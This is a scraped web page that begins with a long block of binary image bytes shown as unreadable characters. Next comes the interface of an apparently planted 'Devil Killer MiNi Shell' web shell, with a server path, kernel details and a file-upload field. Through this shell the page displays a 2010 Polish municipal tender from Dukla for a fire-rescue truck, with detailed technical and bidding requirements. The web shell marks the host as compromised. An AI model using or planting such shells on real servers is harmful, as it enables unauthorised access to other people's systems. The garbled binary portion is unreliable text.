JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100426/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100426/97007-N-2010.html

<p class="kh_header"><b>Dukla: Dostawa średniego samochodu ratowniczo - gaśniczego dla OSP Równe w ramach działania 4.4 Zwalczanie i zapobieganie zagrożeniom Regionalnego Programu  Operacyjnego Województwa Podkarpackiego na lata 2007-2013  projektu pn. Zwiększenie bezpieczeństwa mieszkańców  Gmin Chorkówka, Dukla i Wojaszówka w sytuacji pożarów, klęsk żywiołowych, katastrof technicznych, chemicznych i ekologicznych  - nr RPPK.04.04.00-18-028/09</b><br>
<b>Numer ogłoszenia: 97007 - 2010; data zamieszczenia: 26.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dukla , ul. Trakt Węgierski 11, 38-450 Dukla, woj. podkarpackie, tel. 013 4329135, faks 013 4331011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dukla.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa średniego samochodu ratowniczo - gaśniczego dla OSP Równe w ramach działania 4.4 Zwalczanie i zapobieganie zagrożeniom Regionalnego Programu  Operacyjnego Województwa Podkarpackiego na lata 2007-2013  projektu pn. Zwiększenie bezpieczeństwa mieszkańców  Gmin Chorkówka, Dukla i Wojaszówka w sytuacji pożarów, klęsk żywiołowych, katastrof technicznych, chemicznych i ekologicznych  - nr RPPK.04.04.00-18-028/09.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> L.p	Wyszczególnienie	Wymagania 
Minimum
1	Podwozie z kabiną	 
1.1.	Spełnia wymagania polskich przepisów o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych zgodnie z Ustawą Prawo o ruchu drogowym. 
Rozporządzeniem Ministrów: 
-Spraw Wewnętrznych i Administracji, Obrony Narodowej, Finansów oraz Sprawiedliwości z dnia 24 listopada 2004r. w sprawie warunków technicznych pojazdów specjalnych i pojazdów używanych do celów specjalnych Policji, Agencji Bezpieczeństwa Wewnętrznego, Agencji Wywiadu, Straży Granicznej , Kontroli Skarbowej, Służby Celnej, Służby więziennej i Straży Pożarnej.
- Rozporządzeniem Ministra Infrastruktury z dnia 31.12.2002r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia
Posiada świadectwo dopuszczenia zgodnie z obowiązującym Rozporządzeniem MSWiA z dnia 20 czerwca 2007 r. w sprawie wykazu wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenie tych wyrobów do użytkowania
Podwozie pojazdu powinno posiadać świadectwo homologacji wydane przez Ministra Infrastruktury. W przypadku, gdy przekroczone zostały warunki zabudowy określone przez producenta podwozia wymagane jest świadectwo homologacji całego pojazdu oraz zgoda producenta podwozia na wykonanie zabudowy.
1.2.Podwozie samochodu z napędem 4 x 4, z kabiną załogową 6 osobową. Masa całkowita samochodu gotowego do akcji ratowniczo - gaśniczej (pojazd z załogą, pełnymi zbiornikami, zabudową i wyposażeniem) nie może przekroczyć  14.000 kg.  
1.3. Maksymalna zewnętrzna obrysowa średnica zawracania max 18 m.	 
1.4.Samochód fabrycznie nowy - rok  produkcji 2010	 
1.5.Samochód wyposażony w system: ABS (układ zapobiegający blokowaniu kół podczas hamowania)	 
1.6.Wyposażony w urządzenie sygnalizacyjno - ostrzegawcze, akustyczne i świetlne. Urządzenie akustyczne o mocy 200 W  powinno umożliwiać podawanie komunikatów słownych.  	 
1.7.Wyposażony w 2 lampy sygnalizacyjne stroboskopowe niebieskie pulsacyjne umieszczone z przodu pojazdu.	 
1.8Podwozie samochodu z silnikiem o zapłonie samoczynnym. 
Silnik spełniający normę czystości spalin zgodnie z przepisami ustawy prawo o ruchu drogowym. Spełniający normę EURO5 bez konieczności stosowania dodatkowych płynów w układzie spalinowym.	Min. moc 290KM
1.9.Masowy wskaźnik mocy, określany dla MMR - maksymalnej masy rzeczywistej - min 15kW/tonę	 
1.10.Maksymalna wysokość całkowita pojazdu; 
maksymalna wysokość górnej krawędzi najwyższej półki lub szuflady w położeniu roboczym (po wysunięciu lub rozłożeniu). 
Półki na prowadnicach ze stali nierdzewnej z możliwością regulacji wysokości. 
Pojazd musi być wyposażony w podesty umożliwiające łatwy dostęp do sprzętu przy każdej żaluzji, przy czym otwarcie lub wysunięcie podestów musi być sygnalizowane w kabinie kierowcy.
Sprzęt powinien być rozmieszczony grupowo w zależności od przeznaczenia z zachowaniem ergonomii.	- 3200 mm 
- nie wyżej niż 1850 mm od poziomu terenu
1.11.Napęd 4 x 4: możliwość odłączania napędu osi przedniej,
możliwość blokady mechanizmu różnicowego przedniej i tylnej osi,
przekładnia rozdzielcza z przełożeniem terenowym i szosowym,
zawieszenie: przód - resory paraboliczne, tył - pneumatyczne z możliwością regulacji wysokości. 	 
1.12.	Kabina czterodrzwiowa, fabrycznie jednomodułowa, zapewniająca dostęp do silnika bez podnoszenia kabiny, w układzie miejsc 1 + 1 + 4 (siedzenia przodem do kierunku jazdy), 
Kabina wyposażona w:
indywidualne regulowane oświetlenie nad siedzeniem dowódcy,
niezależny układ ogrzewania i wentylacji, umożliwiający ogrzewanie kabiny przy wyłączonym silniku,
reflektor ręczny do oświetlania numerów budynków
przysłona przeciwsłoneczna zewnętrzna,
elektryczne sterowane szyby przednie,
elektryczne lusterka,
lusterka podgrzewane	 
1.13.Stopnie wejściowe do kabiny - zamocowane na sztywno	
1.14.Fotele wyposażone w pasy bezpieczeństwa, 
siedzenia pokryte materiałem łatwo zmywalnym, odpornym na rozdarcie i ścieranie,
fotele wyposażone w zagłówki,
fotel dla kierowcy z regulacją wysokości, odległości i pochylenia oparcia.	 
1.15.Instalacja elektryczna jednoprzewodowa 24V, z biegunem ujemnym na masie lub dwuprzewodowa w przypadku zabudowy z tworzywa sztucznego. 
Moc alternatora i pojemność akumulatorów musi zapewniać pełne zapotrzebowanie na energię elektryczną przy jej maksymalnym obciążeniu.	 
1.16.Instalacja elektryczna wyposażona w główny wyłącznik prądu.	 
1.17.Pojazd wyposażony w gniazdo (z wtyczką) do ładowania akumulatorów ze źródła zewnętrznego umieszczone po lewej stronie (sygnalizacja podłączenia do zewnętrznego źródła w kabinie kierowcy lub złącze samorozłączalne - komplet). 
1.18.Samochód wyposażony w instalację antenową na pasmo radiowe 148 MHz oraz radiostację samochodową.	 
1.19.Pojazd wyposażony w sygnalizację  świetlną i dźwiękową włączonego biegu wstecznego, jako sygnalizację świetlną dopuszcza się światło cofania.	 
1.20.Kolorystyka: 
samochód - RAL 3000
błotniki i zderzaki - białe
podwozie - czarne	 
1.21.Instalacja pneumatyczna pojazdu zapewniająca możliwość wyjazdu w ciągu 60 s, od chwili uruchomienia silnika samochodu, równocześnie musi być zapewnione prawidłowe funkcjonowanie hamulców. 	 
1.22.Wylot spalin nie może być  skierowany na stanowisko obsługi poszczególnych urządzeń pojazdu oraz musi zapewniać ochronę przed oparzeniami podczas normalnej pracy załogi.	 
1.23.Wszelkie funkcje wszystkich układów i urządzeń pojazdu muszą zachować swoje właściwości pracy w temperaturach otoczenia:	Od - 25 °C do + 50 °C
1.24.Pojemność zbiornika paliwa powinna zapewniać przejazd minimum 300 km lub 4 godzinną pracę autopompy. 	 
1.25.Silnik pojazdu powinien być przystosowany do ciągłej pracy, bez uzupełniania cieczy chłodzącej, oleju oraz przekraczania dopuszczalnych parametrów pracy określonych przez producenta.	- w czasie min. 4 godz. podczas postoju.
1.26.Ogumienie z bieżnikiem dostosowanym do różnych warunków atmosferycznych i terenowych (wielosezonowe).	 
1.27.Pełnowymiarowe koło zapasowe.	 
1.28. Pojazd wyposażony w hak holowniczy z tyłu pojazdu posiadający homologację lub znak bezpieczeństwa. Samochód wyposażony w zaczep holowniczy i szekle z przodu  umożliwiające odholowanie pojazdu.	 
2.Zabudowa pożarnicza:	 
2.1.Wykonana z materiałów odpornych na korozję lub trwale zabezpieczonych antykorozyjnie.	 
2.2.Dach zabudowy w formie podestu roboczego, w wykonaniu antypoślizgowym.
Na dachu mocowanie drabiny D10W	 
2.3.Powierzchnie platform, podestu roboczego i podłogi kabiny w wykonaniu antypoślizgowym.	 
 2.4.Drabina do wejścia na dach. Odległość pierwszego szczebla od podłoża nie może przekroczyć  600 mm.	 
2.5.Skrytki na sprzęt w układzie 3+3+1, zamykane żaluzjami wodo i pyłoszczelnymi wspomaganymi systemem sprężynowym, wykonane z materiałów odpornych na korozję, wyposażone w zamki zamykane na klucz, jeden klucz powinien pasować do wszystkich zamków. Wymagane dodatkowe zabezpieczenie przed samoczynnym otwieraniem skrytek. Dostęp do sprzętu z zachowaniem wymagań ergonomii.  
2.6.Skrytki na sprzęt i przedział  autopompy muszą być wyposażone w oświetlenie: 
- główny wyłącznik oświetlenia skrytek powinien być zainstalowany w kabinie kierowcy.	 
2.7Szuflady, podesty i wysuwane tace blokujące się automatycznie w pozycji zamkniętej i posiadające zabezpieczenie przed całkowitym wyciągnięciem.
Szuflady, podesty i wysuwane tace i inne elementy pojazdu wystające w pozycji otwartej powyżej 250mm poza obrys pojazdu muszą posiadać oznakowanie ostrzegawcze. 	
2.8.Pojazd powinien posiadać  oświetlenie pola pracy wokół samochodu zapewniające oświetlenie w warunkach słabej widoczności oraz oświetlenie powierzchni dachu roboczego.	- minimum 5 luksów w odległości 1 m na poziomie gruntu
2.9.Uchwyty, klamki wszystkich urządzeń samochodu, drzwi żaluzjowych, szuflad, podestów, tac, muszą być tak skonstruowane, aby umożliwiały ich obsługę  w rękawicach.	 
2.10.Konstrukcja skrytek zapewniająca odprowadzenie wody z ich wnętrza.	 
2.11.Zbiornik wody wykonany z materiałów kompozytowych, umieszczony wzdłużnie w stosunku do osi pojazdu. Zbiornik musi być wyposażony w oprzyrządowanie umożliwiające jego bezpieczną eksploatację, z układem zabezpieczającym przed wypływem wody w czasie jazdy. Zbiornik powinien być wyposażony w falochrony i posiadać właz rewizyjny.	- pojemność  2,5 m3 
2.12.Zbiornik środka pianotwórczego wykonany z materiałów kompozytowych odpornych na działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów. 
Zbiornik musi być wyposażony w oprzyrządowanie zapewniające jego bezpieczną  eksploatację.
Napełnianie zbiornika środkiem pianotwórczym powinno być możliwe z poziomu terenu i z dachu pojazdu.	- pojemność minimum 10 pojemności zbiornika wody
2.13.Autopompa zlokalizowana z tyłu pojazdu w obudowanym przedziale, zamykanym drzwiami żaluzjowymi.	 
2.14.Autopompa dwuzakresowa. 
Wydajności min. 2500 l/min przy ciś. 8 bar i Hgs 1,5 m i min. 400 l/min przy ciś. 40 bar i Hgs 1,5 m.	 
2.15.Układ wodno-pianowy zabudowany w taki sposób aby parametry autopompy przy zasilaniu ze zbiornika samochodu były nie mniejsze niż przy zasilaniu ze zbiornika zewnętrznego dla głębokości ssania 1,5m.	 
2.16.Autopompa musi umożliwiać  podanie wody i wodnego roztworu środka pianotwórczego do minimum: 
- dwóch nasad tłocznych o75 zlokalizowanych z tyłu pojazdu lub z boku,
- linii szybkiego natarcia z napędem elektrycznym i  
ręcznym,
- instalacji zraszaczowej,
- działka wodno-pianowego.	 
2.17.Autopompa musi umożliwiać  podanie wody do zbiornika samochodu.	 
2.18. Autopompa musi być wyposażona w urządzenie odpowietrzające umożliwiające zassanie wody: 
z głębokości 1,5 m w czasie do 30 sek,
z głębokości 7,5 m w czasie do 60 sek.	 
2.19.W przedziale autopompy muszą znajdować się co najmniej następujące urządzenia kontrolno - sterownicze pracy pompy: 
manowakuometr,
manometr niskiego ciśnienia,
wskaźnik poziomu wody w zbiorniku samochodu,
wskaźnik poziomu środka pianotwórczego w zbiorniku,
regulator prędkości obrotowej silnika pojazdu,
wyłącznik silnika pojazdu,
kontrolka pracy silnika,(ciśnienia oleju, ładowania akumulatora, temperatury wody)
kontrolka włączenia pompy,
schemat układu wodno - pianowego oraz oznaczenie zaworów.
W kabinie kierowcy powinny znajdować się następujące urządzenia kontrolno-pomiarowe:
manometr niskiego ciśnienia,
wskaźnik poziomu wody w zbiorniku,
wskaźnik poziomu środka pianotwórczego.	 
2.20.Zbiornik wody musi być  wyposażony w nasadę 75 po jednej na obu bokach pojazdu, wyposażona w zawór kulowy do napełniania z hydrantu. Instalacja napełniania powinna mieć konstrukcję zabezpieczającą  przed swobodnym wypływem wody ze zbiornika oraz zawór zabezpieczający przed przepełnieniem zbiornika z możliwością przełączenia na pracę ręczną + instalacja odwadniająca zbiornik.	 
2.21.Autopompa wyposażona w dozownik środka pianotwórczego zapewniający uzyskiwanie minimum stężeń  3% i 6% (tolerancja ? 0,5%) w pełnym zakresie wydajności pompy.	 
2.22. Wszystkie elementy układu wodno - pianowego odporne na korozję i działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów.	 
2.23.Konstrukcja układu wodno - pianowego musi umożliwić jego całkowite odwodnienie przy użyciu co najwyżej dwóch zaworów.	 
2.24.Przedział autopompy wyposażony w system do ogrzewania tego samego producenta jak urządzenie w kabinie kierowcy, sterowany z kabiny kierowcy, skutecznie zabezpieczający układ wodno-pianowy przed zamarzaniem w temperaturze do - 25oC.	 
2.25.Na wlocie ssawnym pompy zamontowany element zabezpieczający przed przedostaniem się do pompy zanieczyszczeń stałych zarówno przy ssaniu ze zbiornika zewnętrznego jak i dla zbiornika własnego pojazdu, gwarantujący bezpieczną  eksploatację pompy.	 
2.26.Pojazd wyposażony w maszt oświetleniowy z reflektorami o łącznej mocy 2000W sterowany elektropneumatycznie z pilota przewodowego.	
2.27.Pojazd posiadający miejsce do indywidualnego montażu sprzętu i regulacji półek. Wyposażony w uchwyty na węże ssawne, tłoczne, prądownice..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.14.42.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Informacja dotycząca wadium  - 5 000,00 zł , słownie : pięć tysięcy złotych
     Wadium wnosi się przed upływem terminu składania ofert.
      Wadium może być wnoszone w jeden lub kilku następujących  formach :
      -    pieniądzu;
    -    poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-     kredytowej,  z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
      -    gwarancjach bankowych;
      -    gwarancjach ubezpieczeniowych ;
Wadium wnoszone w pieniądzu wpłaca się przelewem na konto :Podkarpacki Bank Spółdzielczy w Sanoku Oddział Dukla Nr konta : 58 86 42 10 96 20 10 96 00 18 33 00 02.
Kserokopię dokumentu należy dołączyć do oferty, zaś oryginał spakować oddzielnie jako dokument do ewidencji księgowej, bądź jeśli to możliwe złożyć osobiście w pokoju Nr 2  Urzędu Gminy Dukla ul. Trakt Węgierski 11 , kasa, przed terminem składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku zamawiający uzna oświadczenie stanowiące załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku zamawiający uzna oświadczenie stanowiące załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku zamawiający uzna oświadczenie stanowiące załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie tego warunku zamawiający uzna oświadczenie stanowiące załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie Zamawiający uzna polisę a w przypadku jej braku innego dokumentu potwierdzającego , że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem  zamówienia do wysokości nie niższej niż  500 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o podwykonawcach, w przypadku braku podwykonawców w realizacji zadania również oświadczenie o braku podwykonawców (art.36 ust5 pzp ) wg Załącznika Nr 3 do SIWZ   
zaakceptowany i wypełniony przez wykonawcę projekt umowy wg Załącznika Nr 4 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany w umowie
Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w następującym zakresie :
a) Termin realizacji zamówienia może ulec zmianie w następujących sytuacjach:
zawieszenie dostawy przez Zamawiającego,
wyjątkowo niesprzyjających warunków atmosferycznych,
b)  Wynagrodzenie wykonawcy określone w umowie może ulec zmianom w następujących przypadkach :
zmiana stawki urzędowej podatku VAT,
rezygnacji z części dostaw, jeżeli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy - o wartość niewykonanych robót,
c)  Inne zmiany :
w zakresie podwykonawstwa za uprzednią zgodą Zamawiającego:
- powierzenie podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy,
      - zmiana podwykonawcy na etapie realizacji robót,
      - o ile nie sprzeciwia się to postanowieniom SIWZ.
 w przypadku aktualizacji rozwiązań z uwagi na postęp techniczny lub zmiany obowiązujących przepisów techniczno - budowlanych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dukla.pl<br>
